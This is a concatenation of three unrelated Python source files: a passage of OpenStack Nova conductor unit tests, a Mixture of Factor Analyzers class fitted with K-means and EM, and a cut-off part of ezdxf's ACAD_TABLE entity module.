rebuild_args = self._prepare_rebuild_args({'host': None})
expected_host = 'thebesthost'
request_spec = {}
filter_properties = {'ignore_hosts': [(inst_obj.host)]}
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations',
return_value=[{'host': expected_host}]),
mock.patch('nova.scheduler.utils.build_request_spec',
return_value=request_spec)
) as (rebuild_mock, select_dest_mock, bs_mock):
self.conductor_manager.rebuild_instance(context=self.context,
instance=inst_obj,
**rebuild_args)
select_dest_mock.assert_called_once_with(self.context,
request_spec,
filter_properties)
rebuild_args['host'] = expected_host
rebuild_mock.assert_called_once_with(self.context,
instance=inst_obj,
**rebuild_args)
def test_rebuild_instance_with_scheduler_no_host(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
inst_obj.host = 'noselect'
rebuild_args = self._prepare_rebuild_args({'host': None})
request_spec = {}
filter_properties = {'ignore_hosts': [(inst_obj.host)]}
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason='')),
mock.patch('nova.scheduler.utils.build_request_spec',
return_value=request_spec)
) as (rebuild_mock, select_dest_mock, bs_mock):
self.assertRaises(exc.NoValidHost,
self.conductor_manager.rebuild_instance,
context=self.context, instance=inst_obj,
**rebuild_args)
select_dest_mock.assert_called_once_with(self.context,
request_spec,
filter_properties)
self.assertFalse(rebuild_mock.called)
class ConductorTaskTestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""ComputeTaskManager Tests."""
def setUp(self):
super(ConductorTaskTestCase, self).setUp()
self.conductor = conductor_manager.ComputeTaskManager()
self.conductor_manager = self.conductor
def test_migrate_server_fails_with_rebuild(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, True, None, None, None)
def test_migrate_server_fails_with_flavor(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, False, "dummy", None, None)
def _build_request_spec(self, instance):
return {
'instance_properties': {
'uuid': instance['uuid'], },
}
def _test_migrate_server_deals_with_expected_exceptions(self, ex):
instance = fake_instance.fake_db_instance(uuid='uuid',
vm_state=vm_states.ACTIVE)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
scheduler_utils.set_vm_state_and_notify(self.context,
'compute_task', 'migrate_server',
{'vm_state': vm_states.ACTIVE,
'task_state': None,
'expected_task_state': task_states.MIGRATING},
ex, self._build_request_spec(inst_obj),
self.conductor_manager.db)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(type(ex),
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_migrate_server_deals_with_invalidcpuinfo_exception(self):
instance = fake_instance.fake_db_instance(uuid='uuid',
vm_state=vm_states.ACTIVE)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
ex = exc.InvalidCPUInfo(reason="invalid cpu info.")
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
scheduler_utils.set_vm_state_and_notify(self.context,
'compute_task', 'migrate_server',
{'vm_state': vm_states.ACTIVE,
'task_state': None,
'expected_task_state': task_states.MIGRATING},
ex, self._build_request_spec(inst_obj),
self.conductor_manager.db)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.InvalidCPUInfo,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
@mock.patch.object(scheduler_utils, 'set_vm_state_and_notify')
@mock.patch.object(live_migrate, 'execute')
def test_migrate_server_deals_with_instancenotrunning_exception(self,
mock_live_migrate, mock_set_state):
inst = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
error = exc.InstanceNotRunning(instance_id="fake")
mock_live_migrate.side_effect = error
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.InstanceNotRunning,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None,
'block_migration', 'disk_over_commit')
request_spec = self._build_request_spec(inst_obj)
mock_set_state.assert_called_once_with(self.context, 'compute_task',
'migrate_server',
dict(vm_state=inst_obj.vm_state,
task_state=None,
expected_task_state=task_states.MIGRATING),
error, request_spec, self.conductor_manager.db)
def test_migrate_server_deals_with_DestinationHypervisorTooOld(self):
ex = exc.DestinationHypervisorTooOld()
self._test_migrate_server_deals_with_expected_exceptions(ex)
def test_migrate_server_deals_with_HypervisorUnavailable(self):
ex = exc.HypervisorUnavailable(host='dummy')
self._test_migrate_server_deals_with_expected_exceptions(ex)
def test_migrate_server_deals_with_unexpected_exceptions(self):
instance = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
ex = IOError()
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.MigrationError,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_set_vm_state_and_notify(self):
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
scheduler_utils.set_vm_state_and_notify(
self.context, 'compute_task', 'method', 'updates',
'ex', 'request_spec', self.conductor.db)
self.mox.ReplayAll()
self.conductor._set_vm_state_and_notify(
self.context, 'method', 'updates', 'ex', 'request_spec')
def test_cold_migrate_no_valid_host_back_in_active_state(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type=flavor).AndReturn(request_spec)
exc_info = exc.NoValidHost(reason="")
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
filter_props).AndRaise(exc_info)
updates = {'vm_state': vm_states.ACTIVE,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate,
self.context, inst_obj,
flavor, filter_props, [resvs])
def test_cold_migrate_no_valid_host_back_in_stopped_state(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type=flavor).AndReturn(request_spec)
exc_info = exc.NoValidHost(reason="")
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
filter_props).AndRaise(exc_info)
updates = {'vm_state': vm_states.STOPPED,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor, filter_props, [resvs])
def test_cold_migrate_no_valid_host_error_msg(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
with contextlib.nested(
mock.patch.object(compute_utils, 'get_image_metadata',
return_value=image),
mock.patch.object(scheduler_utils, 'build_request_spec',
return_value=request_spec),
mock.patch.object(self.conductor.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason=""))
) as (image_mock, brs_mock, select_dest_mock):
nvh = self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor, filter_props, [resvs])
self.assertIn('cold migrate', nvh.message)
def test_cold_migrate_exception_host_in_error_state_and_raise(self):
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
hosts = [dict(host='host1', nodename=None, limits={})]
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(scheduler_utils,
'populate_filter_properties')
self.mox.StubOutWithMock(self.conductor.compute_rpcapi,
'prep_resize')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type='flavor').AndReturn(request_spec)
expected_filter_props = {'retry': {'num_attempts': 1,
'hosts': []},
'context': None}
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
expected_filter_props).AndReturn(hosts)
scheduler_utils.populate_filter_properties(filter_props,
hosts[0])
exc_info = test.TestingException('something happened')
expected_filter_props = {'retry': {'num_attempts': 1,
'hosts': []}}
self.conductor.compute_rpcapi.prep_resize(
self.context, image, inst_obj,
'flavor', hosts[0]['host'], [resvs],
request_spec=request_spec,
filter_properties=expected_filter_props,
node=hosts[0]['nodename']).AndRaise(exc_info)
updates = {'vm_state': vm_states.STOPPED,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(test.TestingException,
self.conductor._cold_migrate,
self.context, inst_obj, 'flavor',
filter_props, [resvs])
def test_resize_no_valid_host_error_msg(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
flavor_new = flavors.get_flavor_by_name('m1.small')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
with contextlib.nested(
mock.patch.object(compute_utils, 'get_image_metadata',
return_value=image),
mock.patch.object(scheduler_utils, 'build_request_spec',
return_value=request_spec),
mock.patch.object(self.conductor.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason=""))
) as (image_mock, brs_mock, select_dest_mock):
nvh = self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor_new, filter_props,
[resvs])
self.assertIn('resize', nvh.message)
def test_build_instances_instance_not_found(self):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
self.mox.StubOutWithMock(instances[0], 'refresh')
self.mox.StubOutWithMock(instances[1], 'refresh')
image = {'fake-data': 'should_pass_silently'}
spec = {'fake': 'specs',
'instance_properties': instances[0]}
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(scheduler_driver, 'handle_schedule_error')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
scheduler_utils.build_request_spec(self.context, image,
mox.IgnoreArg()).AndReturn(spec)
self.conductor_manager.scheduler_client.select_destinations(
self.context, spec,
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(
[{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}])
instances[0].refresh().AndRaise(
exc.InstanceNotFound(instance_id=instances[0].uuid))
instances[1].refresh()
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context, instance=instances[1], host='host2',
image={'fake-data': 'should_pass_silently'}, request_spec=spec,
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2',
'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IsA(objects.BlockDeviceMappingList),
node='node2', limits=[])
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
@mock.patch.object(scheduler_utils, 'build_request_spec')
def test_build_instances_info_cache_not_found(self, build_request_spec):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
image = {'fake-data': 'should_pass_silently'}
destinations = [{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}]
spec = {'fake': 'specs',
'instance_properties': instances[0]}
build_request_spec.return_value = spec
with contextlib.nested(
mock.patch.object(instances[0], 'refresh',
side_effect=exc.InstanceInfoCacheNotFound(
instance_uuid=instances[0].uuid)),
mock.patch.object(instances[1], 'refresh'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations', return_value=destinations),
mock.patch.object(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
) as (inst1_refresh, inst2_refresh, select_destinations,
build_and_run_instance):
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
build_and_run_instance.assert_called_once_with(self.context,
instance=instances[1], host='host2', image={'fake-data':
'should_pass_silently'}, request_spec=spec,
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2',
'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mock.ANY,
node='node2', limits=[])
class ConductorTaskRPCAPITestCase(_BaseTaskTestCase,
test_compute.BaseTestCase):
"""Conductor compute_task RPC namespace Tests."""
def setUp(self):
super(ConductorTaskRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_rpcapi.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorTaskAPITestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""Compute task API Tests."""
def setUp(self):
super(ConductorTaskAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorLocalComputeTaskAPITestCase(ConductorTaskAPITestCase):
"""Conductor LocalComputeTaskAPI Tests."""
def setUp(self):
super(ConductorLocalComputeTaskAPITestCase, self).setUp()
self.conductor = conductor_api.LocalComputeTaskAPI()
self.conductor_manager = self.conductor._manager._target
|
|
__all__ = ["Mofa"]
import numpy as np
import matplotlib.pyplot as pl
from scipy.cluster.vq import kmeans
from scipy.linalg import inv
from matplotlib.patches import Ellipse
from . import _algorithms
class Mofa(object):
"""
Mixture of Factor Analyzers
calling arguments:
[ROSS DOCUMENT HERE]
internal variables:
`K`: Number of components
`M`: Latent dimensionality
`D`: Data dimensionality
`N`: Number of data points
`data`: (N,D) array of observations
`latents`: (K,M,N) array of latent variables
`latent_covs`: (K,M,M,N) array of latent covariances
    `lambdas`: (K,D,M) array of loadings
`psis`: (K,D) array of diagonal variance values
`rs`: (K,N) array of responsibilities
`amps`: (K) array of component amplitudes
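    A minimal usage sketch (illustrative only; `X` stands for a hypothetical
    (N, D) array of observations, the other names are real members of this
    class):
        mix = Mofa(X, K=3, M=2)
        mix.run_em()
        mix.plot_2d_ellipses(0, 1)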
"""
def __init__(self,data,K,M,
PPCA=False,lock_psis=False,
rs_clip = 0.0,
max_condition_number=1.e6,
init=True,init_ppca=True):
# required
self.K = K
self.M = M
self.data = np.atleast_2d(data)
self.dataT = self.data.T # INSANE DATA DUPLICATION
self.N = self.data.shape[0]
self.D = self.data.shape[1]
# options
self.PPCA = PPCA
self.lock_psis = lock_psis
self.rs_clip = rs_clip
self.max_condition_number = float(max_condition_number)
assert rs_clip >= 0.0
# empty arrays to be filled
self.betas = np.zeros((self.K,self.M,self.D))
self.latents = np.zeros((self.K,self.M,self.N))
self.latent_covs = np.zeros((self.K,self.M,self.M,self.N))
self.kmeans_rs = np.zeros(self.N, dtype=int)
self.rs = np.zeros((self.K,self.N))
# initialize
if init:
self._initialize(init_ppca)
def _initialize(self,init_ppca,maxiter=200, tol=1e-4):
# Run K-means
# This is crazy, but DFM's kmeans returns nans/infs
# for some initializations
self.means = kmeans(self.data,self.K)[0]
self.run_kmeans()
# Randomly assign factor loadings
self.lambdas = np.random.randn(self.K,self.D,self.M) / \
np.sqrt(self.max_condition_number)
# Set (high rank) variance to variance of all data, along a dimension
self.psis = np.tile(np.var(self.data,axis=0)[None,:],(self.K,1))
# Set initial covs
self.covs = np.zeros((self.K,self.D,self.D))
self.inv_covs = 0. * self.covs
self._update_covs()
# Randomly assign the amplitudes.
self.amps = np.random.rand(self.K)
self.amps /= np.sum(self.amps)
if init_ppca:
# for each cluster, run a PPCA
for k in range(self.K):
ind = self.kmeans_rs==k
self.rs[k,ind] = 1
sumrs = np.sum(self.rs[k])
# run em
L = None
for i in xrange(maxiter):
self._one_component_E_step(k)
newL = self._log_sum(
self._log_multi_gauss(k,self.data[ind]))
newL = np.sum(newL)
self._one_component_M_step(k,sumrs,True)
self._update_covs()
                    if L is not None:
dL = np.abs((newL - L) / L)
if i > 5 and dL < tol:
break
L = newL
def run_kmeans(self, maxiter=200, tol=1e-4, verbose=True):
"""
Run the K-means algorithm using the C extension.
:param maxiter:
The maximum number of iterations to try.
:param tol:
The tolerance on the relative change in the loss function that
controls convergence.
:param verbose:
Print all the messages?
"""
iterations = _algorithms.kmeans(self.data, self.means,
self.kmeans_rs, tol, maxiter)
if verbose:
if iterations < maxiter:
print("K-means converged after {0} iterations."
.format(iterations))
else:
print("K-means *didn't* converge after {0} iterations."
.format(iterations))
def run_em(self, maxiter=400, tol=1e-4, verbose=True):
"""
Run the EM algorithm.
:param maxiter:
The maximum number of iterations to try.
:param tol:
The tolerance on the relative change in the loss function that
controls convergence.
:param verbose:
Print all the messages?
"""
L = None
for i in xrange(maxiter):
self._E_step()
newL = self.logLs.sum()
if i == 0 and verbose:
print("Initial NLL =", -newL)
self._M_step()
            if L is not None:
dL = np.abs((newL - L) / L)
if i > 5 and dL < tol:
break
L = newL
if i < maxiter - 1:
if verbose:
print("EM converged after {0} iterations".format(i))
print("Final NLL = {0}".format(-newL))
else:
print("Warning: EM didn't converge after {0} iterations"
.format(i))
def take_EM_step(self):
"""
Do one E step and then do one M step. Duh!
"""
self._E_step()
self._M_step()
def _E_step(self):
"""
Expectation step. See docs for details.
"""
        # responsibilities and likelihoods
self.logLs, self.rs = self._calc_probs()
for k in range(self.K):
self._one_component_E_step(k)
def _M_step(self):
"""
Maximization step. See docs for details.
This assumes that `_E_step()` has been run.
"""
sumrs = np.sum(self.rs,axis=1)
# maximize for each component
for k in range(self.K):
self._one_component_M_step(k,sumrs[k],self.PPCA)
self.amps[k] = sumrs[k] / self.N
if self.lock_psis:
psi = np.dot(sumrs, self.psis) / np.sum(sumrs)
for k in range(self.K):
self.psis[k] = psi
self._update_covs()
def _one_component_E_step(self,k):
"""
Calculate the E step for one component.
"""
# beta
self.betas[k] = np.dot(self.lambdas[k].T,self.inv_covs[k])
# latent values
zeroed = self.dataT - self.means[k, :, None]
self.latents[k] = np.dot(self.betas[k], zeroed)
# latent empirical covariance
step1 = self.latents[k, :, None, :] * self.latents[k, None, :, :]
step2 = np.dot(self.betas[k], self.lambdas[k])
self.latent_covs[k] = np.eye(self.M)[:,:,None] - step2[:,:,None] + step1
def _one_component_M_step(self,k,sumrs,PPCA):
"""
Calculate the M step for one component.
"""
# means
lambdalatents = np.dot(self.lambdas[k], self.latents[k])
self.means[k] = np.sum(self.rs[k] * (self.dataT - lambdalatents),
axis=1) / sumrs
# lambdas
zeroed = self.dataT - self.means[k,:, None]
self.lambdas[k] = np.dot(np.dot(zeroed[:,None,:] *
self.latents[k,None,:,:],self.rs[k]),
inv(np.dot(self.latent_covs[k],self.rs[k])))
# psis
# hacking a floor for psis
psis = np.dot((zeroed - lambdalatents) * zeroed,self.rs[k]) / sumrs
maxpsi = np.max(psis)
maxlam = np.max(np.sum(self.lambdas[k] * self.lambdas[k], axis=0))
minpsi = np.max([maxpsi, maxlam]) / self.max_condition_number
psis = np.clip(psis, minpsi, np.Inf)
if PPCA:
psis = np.mean(psis) * np.ones(self.D)
self.psis[k] = psis
def _update_covs(self):
"""
        Update self.covs and self.inv_covs for the responsibility and logL calculations.
"""
for k in range(self.K):
self.covs[k] = np.dot(self.lambdas[k],self.lambdas[k].T) + \
np.diag(self.psis[k])
self.inv_covs[k] = self._invert_cov(k)
def _calc_probs(self):
"""
        Calculate log likelihoods, responsibilities for each datum
under each component.
"""
logrs = np.zeros((self.K, self.N))
for k in range(self.K):
logrs[k] = np.log(self.amps[k]) + self._log_multi_gauss(k, self.data)
        # normalize the responsibilities with a log-sum-exp over components,
        # working in log space to avoid overflow in the exponentials
L = self._log_sum(logrs)
logrs -= L[None, :]
if self.rs_clip > 0.0:
logrs = np.clip(logrs,np.log(self.rs_clip),np.Inf)
return L, np.exp(logrs)
    def _log_multi_gauss(self, k, data):
"""
Gaussian log likelihood of the data for component k.
"""
sgn, logdet = np.linalg.slogdet(self.covs[k])
assert sgn > 0
        X1 = (data - self.means[k]).T
X2 = np.dot(self.inv_covs[k], X1)
p = -0.5 * np.sum(X1 * X2, axis=0)
return -0.5 * np.log(2 * np.pi) * self.D - 0.5 * logdet + p
def _log_sum(self,loglikes):
"""
        Calculate the log of the summed likelihoods (log-sum-exp along axis 0).
"""
loglikes = np.atleast_2d(loglikes)
a = np.max(loglikes, axis=0)
return a + np.log(np.sum(np.exp(loglikes - a[None, :]), axis=0))
def _invert_cov(self,k):
"""
Calculate inverse covariance of mofa or ppca model,
using inversion lemma
"""
psiI = inv(np.diag(self.psis[k]))
lam = self.lambdas[k]
lamT = lam.T
step = inv(np.eye(self.M) + np.dot(lamT,np.dot(psiI,lam)))
step = np.dot(step,np.dot(lamT,psiI))
step = np.dot(psiI,np.dot(lam,step))
return psiI - step
def plot_2d_ellipses(self,d1,d2, **kwargs):
"""
Make a 2D plot of the model projected onto axes
d1 and d2.
"""
for k in range(self.K):
mean = self.means[k,(d1, d2)]
cov = self.covs[k][((d1, d2),(d1, d2)), ((d1, d1), (d2, d2))]
self._plot_2d_ellipse(mean, cov, **kwargs)
def _plot_2d_ellipse(self, mu, cov, ax=None, **kwargs):
"""
        Plot the error ellipse at a point given its covariance matrix.
"""
# some sane defaults
facecolor = kwargs.pop('facecolor', 'none')
edgecolor = kwargs.pop('edgecolor', 'k')
x, y = mu
U, S, V = np.linalg.svd(cov)
theta = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
ellipsePlot = Ellipse(xy=[x, y],
width=2 * np.sqrt(S[0]),
height=2 * np.sqrt(S[1]),
angle=theta,
facecolor=facecolor, edgecolor=edgecolor, **kwargs)
if ax is None:
ax = pl.gca()
ax.add_patch(ellipsePlot)
|
|
# Copyright (c) 2019-2021 Manfred Moitzi
# License: MIT License
from typing import TYPE_CHECKING, Iterable, Optional
import copy
from ezdxf.math import Vec3, Matrix44
from ezdxf.lldxf.tags import Tags
from ezdxf.lldxf.attributes import (
DXFAttr,
DXFAttributes,
DefSubclass,
XType,
group_code_mapping,
)
from ezdxf.lldxf import const
from ezdxf.entities import factory
from .dxfentity import base_class, SubclassProcessor, DXFEntity, DXFTagStorage
from .dxfgfx import DXFGraphic, acdb_entity
from .dxfobj import DXFObject
from .objectcollection import ObjectCollection
if TYPE_CHECKING:
from ezdxf.eztypes import (
TagWriter,
DXFNamespace,
Drawing,
)
__all__ = ["AcadTable", "AcadTableBlockContent"]
@factory.register_entity
class AcadTableBlockContent(DXFTagStorage):
DXFTYPE = "ACAD_TABLE"
def proxy_graphic_content(self) -> Iterable[DXFGraphic]:
return super().__virtual_entities__()
def _block_content(self) -> Iterable[DXFGraphic]:
tags = self._block_reference_tags()
block_name: str = tags.get_first_value(2, "*")
return self.doc.blocks.get(block_name, []) # type: ignore
def _block_reference_tags(self) -> Tags:
try:
return self.xtags.get_subclass("AcDbBlockReference")
except const.DXFKeyError:
return Tags()
def _insert_location(self) -> Vec3:
return self._block_reference_tags().get_first_value(10, Vec3())
def __virtual_entities__(self) -> Iterable[DXFGraphic]:
"""Implements the SupportsVirtualEntities protocol."""
insert: Vec3 = Vec3(self._insert_location())
m: Optional[Matrix44] = None
if insert:
            # TODO: OCS transformation (extrusion) is not applied yet
m = Matrix44.translate(insert.x, insert.y, insert.z)
for entity in self._block_content():
try:
clone = entity.copy()
except const.DXFTypeError:
continue
if m is not None:
# noinspection PyUnboundLocalVariable
try:
clone.transform(m)
                except Exception:  # skip entity at any transformation issue
continue
yield clone
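# Usage sketch (not part of this module; ezdxf.protocols.virtual_entities is the
# assumed public entry point for the SupportsVirtualEntities protocol implemented
# above):
#
#     from ezdxf.protocols import virtual_entities
#     for entity in virtual_entities(acad_table):  # acad_table: a loaded ACAD_TABLE
#         print(entity.dxftype())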
acdb_block_reference = DefSubclass(
"AcDbBlockReference",
{
# Block name: an anonymous block begins with a *T value
"geometry": DXFAttr(2),
# Insertion point:
"insert": DXFAttr(10, xtype=XType.point3d, default=Vec3(0, 0, 0)),
},
)
acdb_block_reference_group_codes = group_code_mapping(acdb_block_reference)
acdb_table = DefSubclass(
"AcDbTable",
{
# Table data version number: 0 = 2010
"version": DXFAttr(280),
        # Hard pointer ID of the TABLESTYLE object:
"table_style_id": DXFAttr(342),
# Handle of the associated anonymous BLOCK containing the graphical
# representation:
"block_record_handle": DXFAttr(343),
# Horizontal direction vector:
"horizontal_direction": DXFAttr(11),
# Flag for table value (unsigned integer):
"table_value": DXFAttr(90),
# Number of rows:
"n_rows": DXFAttr(91),
# Number of columns:
"n_cols": DXFAttr(92),
# Flag for an override:
"override_flag": DXFAttr(93),
# Flag for an override of border color:
"border_color_override_flag": DXFAttr(94),
# Flag for an override of border lineweight:
"border_lineweight_override_flag": DXFAttr(95),
# Flag for an override of border visibility:
"border_visibility_override_flag": DXFAttr(96),
# 141: Row height; this value is repeated, 1 value per row
# 142: Column height; this value is repeated, 1 value per column
# for every cell:
# 171: Cell type; this value is repeated, 1 value per cell:
